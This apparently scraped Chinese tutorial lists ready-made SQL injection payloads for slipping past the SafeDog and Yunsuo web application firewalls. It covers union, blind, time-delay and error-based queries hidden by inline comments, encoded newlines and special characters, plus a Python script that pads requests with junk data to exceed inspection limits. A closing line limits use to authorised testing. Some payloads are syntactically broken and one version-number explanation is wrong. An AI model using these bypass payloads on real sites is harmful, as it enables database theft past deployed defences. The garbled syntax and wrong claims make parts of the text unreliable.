WAF Bypass 技术学习 - 安全狗与云锁绕过详解<\/h1>

安全狗绕过技术<\/h2>

联合注入绕过<\/h3>

版本信息<\/strong>：安全狗 4.0.2655<\/p>

特殊运算符绕过<\/strong>：<\/p>

使用 |<\/code> 按位或运算符<\/li>
使用 -<\/code> 减号<\/li> <\/ul> 内联注释技巧<\/strong>：<\/p> 标准格式：\/*!版本号 SQL语句*\/<\/code><\/li> 版本号必须为5位数字（如11440）<\/li> 示例：\/*!11440select*\/<\/code> 表示MySQL版本大于11.4.40时执行<\/li> <\/ul> 注释+换行绕过<\/strong>：<\/p> union select<\/code> + 注释换行 → 拦截<\/li> union all select<\/code> + 注释换行 → 不拦截<\/li> 区别：union去重，union all不去重<\/li> <\/ul> 有效Payload示例<\/strong>：<\/p> ?<\/span>id=-<\/span>1<\/span>' union all%23%0a select 1,group_concat(table_name),3 from `information_schema`.`tables` where table_schema='<\/span>security<\/span>'--+ <\/span><\/span><\/span><\/code><\/pre>?<\/span>id=-<\/span>1<\/span>' union all%23%0a select 1,group_concat(column_name),3 from `information_schema`.columns where table_name='<\/span>user<\/span>'--+ <\/span><\/span><\/span><\/code><\/pre>?<\/span>id=-<\/span>1<\/span>' union all%23%0a select 1,username,password from `users` limit 1 --+ <\/span><\/span><\/span><\/code><\/pre>盲注绕过<\/h3> IF语句绕过<\/strong>：<\/p> 安全狗过滤 and if<\/code> 和 or if<\/code><\/li> 解决方案：在and<\/code>后添加奇数个特殊符号 ~~~<\/code>（波浪号）<\/li> !!!<\/code>（感叹号）<\/li> ---<\/code>（减号）<\/li> <\/ul> <\/li> <\/ul> 延时注入Payload<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>' and~~~if((substr((select hex(user\/1,1)>01),sleep\/**\/(\/*!5*\/),1)--+ <\/span><\/span><\/span><\/code><\/pre>注意<\/strong>：使用~~~<\/code>时可能出现双倍延时现象<\/p> Bool盲注Payload<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>' and!!! substr((select unhex(hex(user\/**\/(\/*!*\/))),1,1)=r <\/span><\/span><\/span><\/code><\/pre>?<\/span>id=<\/span>1<\/span>' \/*!&&*\/ substr(unhex(hex(user\/2,1)='<\/span>o'--+ <\/span><\/span><\/span><\/code><\/pre>报错注入绕过<\/h3> Payload示例<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span> \/*!&&*\/<\/span> \/*!11440updatexml*\/<\/span>(1<\/span>,concat\/**\/<\/span>(0<\/span>x7e,user<\/span>\/<\/span>0<\/span>x7e),1<\/span>)--+ <\/span><\/span><\/span><\/code><\/pre>云锁绕过技术<\/h2> POST请求绕过<\/h3> 垃圾数据填充原理<\/strong>：<\/p> WAF存在检测长度限制<\/li> 超过长度后WAF会直接放行请求<\/li> 防止WAF检测影响业务性能<\/li> <\/ul> 垃圾数据生成方法（Python）<\/strong>：<\/p> import<\/span> random <\/span><\/span>ls =<\/span> [chr(i) for<\/span> i in<\/span> range(33<\/span>,125<\/span>)] <\/span><\/span>ls.<\/span>remove("#"<\/span>) # 防止URL被注释<\/span> <\/span><\/span>ls.<\/span>remove("*"<\/span>) # 方便使用sqlmap<\/span> <\/span><\/span>s =<\/span> ""<\/span> <\/span><\/span>for<\/span> i in<\/span> range(10000<\/span>): <\/span><\/span> s =<\/span> s +<\/span> random.<\/span>choice(ls) <\/span><\/span>print(s) <\/span><\/span><\/code><\/pre>特殊技巧<\/strong>：<\/p> 在Payload中插入#<\/code>可能使云锁将后续内容视为注释<\/li> <\/ul> GET请求绕过<\/h3> 注意事项<\/strong>：<\/p> GET请求有长度限制<\/li> 需要平衡垃圾数据量和长度限制<\/li> <\/ul> 有效Payload<\/strong>：<\/p> &<\/span>id=<\/span>1<\/span>' and \/*!11440updatexml*\/(1,concat(0x7e,(\/*!11440select*\/+group_concat(table_name)\/**\/from+information_schema.tables+where+table_schema=0x64767761),0x7e),1)--+&Submit=Submit <\/span><\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p> 移除部分垃圾数据后仍可绕过<\/li> 垃圾数据能扰乱云锁的正则规则匹配<\/li> <\/ul> 通用绕过技巧总结<\/h2> 注释技巧<\/strong>：<\/p> 使用\/*!版本号*\/<\/code>格式<\/li> 结合换行符%23%0a<\/code><\/li> 避免使用\/*!\/*!\/<\/code>这种明显格式<\/li> <\/ul> <\/li> 特殊字符<\/strong>：<\/p> 反引号`<\/code>用于包裹表名\/列名<\/li> 波浪号~<\/code>、感叹号!<\/code>等特殊符号干扰<\/li> <\/ul> <\/li> 编码转换<\/strong>：<\/p> 使用hex编码代替字符串（如0x7365637572697479<\/code>代替'security'）<\/li> 使用unhex(hex())<\/code>组合<\/li> <\/ul> <\/li> 函数变形<\/strong>：<\/p> 在函数名后添加注释如sleep\/**\/()<\/code><\/li> 使用内联注释包裹函数名\/*!11440updatexml*\/<\/code><\/li> <\/ul> <\/li> 垃圾数据<\/strong>：<\/p> 填充足够长度的随机字符<\/li> 避免使用可能影响解析的特殊字符（如#<\/code>、*<\/code>）<\/li> <\/ul> <\/li> 版本特性<\/strong>：<\/p> 利用特定MySQL版本号的注释特性<\/li> 版本号必须为5位数字<\/li> <\/ul> <\/li> <\/ol> 通过综合运用这些技术，可以有效绕过安全狗和云锁等WAF的防护机制，但请注意这些技术仅用于安全研究和授权测试。<\/p>